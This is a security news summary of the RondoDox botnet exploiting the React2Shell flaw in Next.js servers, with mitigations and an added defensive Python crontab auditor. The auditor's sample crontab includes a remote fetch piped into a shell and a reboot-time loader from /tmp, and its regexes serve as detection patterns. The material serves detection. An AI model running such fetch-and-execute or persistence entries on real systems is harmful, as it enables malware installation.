RondoDox Botnet Expands Scope With React2Shell Exploitation

Summary

Researchers report that the RondoDox botnet is exploiting the React2Shell flaw (CVE-2025-55182) to target Next.js Server Actions and achieve remote code execution. The campaign, observed ramping up since December, scans for vulnerable Next.js servers and installs multiple payloads including cryptominers, a Mirai-based IoT botnet variant and an aggressive loader that enforces persistence and removes competing malware.

The activity is widespread: researchers estimate around 90,300 exposed Next.js instances globally, and note that RondoDox can deploy binaries for x86, x86_64, MIPS, ARM and PowerPC, allowing infection across cloud instances, edge devices and IoT fleets.

Key Points

  • RondoDox weaponises React2Shell (CVE-2025-55182) against Next.js Server Actions to gain initial access and RCE.
  • Observed payloads include cryptominers, a Mirai-based botnet variant, and a loader that removes rival malware and creates persistence via cron jobs.
  • Approximately 90,300 vulnerable Next.js servers are exposed worldwide, with major concentrations in the US, Germany, France and India.
  • The botnet supports multiple architectures (x86, x86_64, MIPS, ARM, PowerPC) and uses fallback transfer methods (wget, curl, tftp, ftp) to maximise reach.
  • Recommended mitigations: patch Next.js/React Server Components, segment IoT into VLANs, deploy a WAF, restrict internet exposure of admin/dev servers, monitor for unknown processes/cron jobs and block known C2 infrastructure.
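The last two points call for monitoring cron jobs and for knowing which transfer tools the loader falls back to. As an added example (not code from the page, the researchers or the Dark Reading article), the Python script below audits crontab text and flags entries that match the behaviour described above: a command that fetches from a remote host with wget, curl, tftp or ftp, pipes what it fetched into a shell, or executes something from a scratch directory. The regular expressions, the sample crontab and the 198.51.100.7 address are constructed for this example and are not indicators taken from the page.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Transfer tools the Key Points list as the loader's fallback methods.
TOOL_RE = re.compile(r"\b(wget|curl|tftp|ftp)\b")

# Heuristics chosen for this example (assumptions, not indicators from the page):
# a remote URL or bare IPv4 literal, a pipe into a shell interpreter, and
# execution of a file living in a world-writable scratch directory.
REMOTE_REF = re.compile(r"(https?://|ftp://|\b\d{1,3}(?:\.\d{1,3}){3}\b)")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da|a)?sh\b")
SCRATCH_EXEC = re.compile(r"(?:^|[\s;&|])/(?:tmp|dev/shm|var/tmp)/\S+")


@dataclass
class Finding:
    line_no: int
    entry: str
    reasons: list[str]


def split_cron_line(line: str) -> tuple[str, str] | None:
    """Return (schedule, command) for a user-crontab line.

    Blank lines, comments and environment assignments (MAILTO=root) return None.
    Note: /etc/crontab and /etc/cron.d files carry an extra user field and are
    not handled by this parser.
    """
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    first = stripped.split(None, 1)[0]
    if "=" in first:  # environment assignment such as MAILTO=root
        return None
    if first.startswith("@"):  # @reboot, @daily and similar shorthands
        parts = stripped.split(None, 1)
        return (parts[0], parts[1] if len(parts) > 1 else "")
    fields = stripped.split(None, 5)
    if len(fields) < 6:
        return None
    return (" ".join(fields[:5]), fields[5])


def audit_command(command: str) -> list[str]:
    """Return the list of reasons a cron command deserves review (empty if none)."""
    reasons: list[str] = []
    tool = TOOL_RE.search(command)
    if tool and REMOTE_REF.search(command):
        reasons.append(f"{tool.group(1)} fetches from a remote host")
    if PIPE_TO_SHELL.search(command):
        reasons.append("fetched content is piped into a shell")
    if SCRATCH_EXEC.search(command):
        reasons.append("executes a file from a scratch directory")
    return reasons


def audit_crontab(text: str) -> list[Finding]:
    """Walk crontab text and collect every entry that trips a heuristic."""
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), 1):
        parsed = split_cron_line(line)
        if parsed is None:
            continue
        _schedule, command = parsed
        reasons = audit_command(command)
        if reasons:
            findings.append(Finding(line_no, line.strip(), reasons))
    return findings


# Constructed sample crontab for this example; not an artefact from the page.
SAMPLE_CRONTAB = """\
# constructed sample crontab, not a real infection artefact
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh --quiet
*/5 * * * * wget -q http://198.51.100.7/update.sh -O - | sh
@reboot /tmp/.x/loader
15 4 * * 0 curl -s https://updates.example.org/healthcheck
"""

if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {finding.line_no}: {finding.entry}")
        for reason in finding.reasons:
            print(f"    - {reason}")
```

Run it against the output of `crontab -l` for each local user; the healthcheck entry in the sample is flagged on one heuristic only, which is the point: a remote fetch by itself is a prompt for a human to look, while a fetch piped straight into a shell, or a binary launched from /tmp at reboot, is the combination the loader behaviour described above would leave behind.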

Context and Relevance

RondoDox first surfaced exploiting DVRs and routers and has grown into a multi-purpose loader that now targets web frameworks as an initial vector. Its shift to exploiting a popular web framework vulnerability raises the stakes for web-facing applications and any connected IoT devices. Organisations running Next.js or exposing network appliances are at immediate risk from automated scanning and infection attempts that can lead to botnet enrolment, DDoS participation and stealth cryptomining.

Why should I read this?

Short and blunt: if you run Next.js apps, manage web servers or look after IoT kit, this matters. The exploit is active and automated — patching and basic network hygiene will help, but only if you act now. We’ve read the detail so you don’t have to; do a quick inventory sweep and apply fixes.

Source

Source: https://www.darkreading.com/vulnerabilities-threats/rondodox-botnet-scope-react2shell-exploitation